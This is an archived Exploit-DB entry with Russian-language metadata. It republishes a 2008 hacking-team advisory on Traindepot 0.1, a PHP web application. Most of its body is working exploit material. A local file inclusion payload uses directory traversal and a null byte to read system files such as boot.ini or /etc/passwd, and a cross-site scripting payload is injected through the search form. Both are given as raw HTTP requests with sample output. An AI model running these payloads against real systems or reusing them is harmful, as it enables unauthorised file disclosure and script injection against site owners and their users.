- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5848
- Проверка EDB
-
- Пройдено
- Автор
- CWH UNDERGROUND
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2839 cve-2008-2838
- Дата публикации
- 2008-06-18
Код:
============================================================
Traindepot 0.1 (LFI/XSS) Multiple Remote Vulnerabilities
============================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 18 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Traindepot
VERSION : 0.1
VENDOR : N/A
DOWNLOAD : http://downloads.sourceforge.net/traindepot
#####################################################
--- Local File Inclusion ---
-------------
Exploit
-------------
[+] http://[Target]/[Traindepot_path]/index.php?module=[LFI]
-------------
POC Exploit
-------------
[+] GET http://192.168.24.25/traindepot/index.php?module=../../../../../../../../boot.ini%00 HTTP/1.1
[+] Accept: */*
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Cookie: PHPSESSID=3954bc593bfbf164295dfabbe2459187
This exploit will open boot.ini in system file:
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
You can change boot.ini to /etc/passwd%00 in linux OS.
--- Remote XSS (query) ---
[+] http://[Target]/[Traindepot_path]/index.php?module=search
---------------------------
POC Exploit [POST Method]
---------------------------
[+] POST http://192.168.24.25/traindepot/index.php?module=search HTTP/1.1
[+] Accept: */*
[+] Content-Type: application/x-www-form-urlencoded
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Content-Length: 70
[+] Cookie: PHPSESSID=3954bc593bfbf164295dfabbe2459187
[+] query=<script>alert(123);</script>&search=%3F
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-18]
- Источник
- www.exploit-db.com